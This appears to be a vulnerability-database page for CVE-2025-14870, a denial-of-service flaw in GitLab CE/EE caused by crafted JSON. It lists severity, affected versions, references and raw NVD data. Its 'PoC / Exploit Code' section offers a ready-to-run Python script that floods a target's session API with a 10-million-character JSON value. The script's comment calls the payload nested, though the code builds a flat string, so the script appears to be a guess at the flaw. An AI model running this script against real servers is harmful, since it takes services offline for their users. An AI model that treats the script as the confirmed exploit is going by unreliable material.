CVE-2025-14870

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.5 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an unauthenticated user to cause denial of service by sending specially crafted JSON payloads due to insufficient input validation.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

GitLab CE/EE >= 18.5, < 18.9.7

GitLab CE/EE >= 18.10, < 18.10.6

GitLab CE/EE >= 18.11, < 18.11.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# Exploit Title: GitLab CE/EE DoS via Crafted JSON
# Date: 2026-05-14
# Exploit Author: Analyst

target_url = "http://target-gitlab-instance.com/api/v4/session"

# Generate a large nested JSON payload to trigger resource exhaustion
# This simulates the "specially crafted JSON payloads" mentioned in the description
data = {"key": "A" * 10000000} 

headers = {
    "Content-Type": "application/json"
}

try:
    print("Sending malicious payload...")
    response = requests.post(target_url, data=json.dumps(data), headers=headers, timeout=10)
    print(f"Response Status: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"Potential DoS triggered or connection lost: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14870
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14870
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14870/
[4] VulDB https://vuldb.com/cve/CVE-2025-14870
[5] https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/
[6] https://gitlab.com/gitlab-org/gitlab/-/work_items/584490
[7] https://hackerone.com/reports/3446641

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14870", "sourceIdentifier": "[email protected]", "published": "2026-05-14T06:16:20.887", "lastModified": "2026-05-14T16:20:43.240", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.5 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an unauthenticated user to cause denial of service by sending specially crafted JSON payloads due to insufficient input validation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/", "source": "[email protected]"}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/584490", "source": "[email protected]"}, {"url": "https://hackerone.com/reports/3446641", "source": "[email protected]"}]}}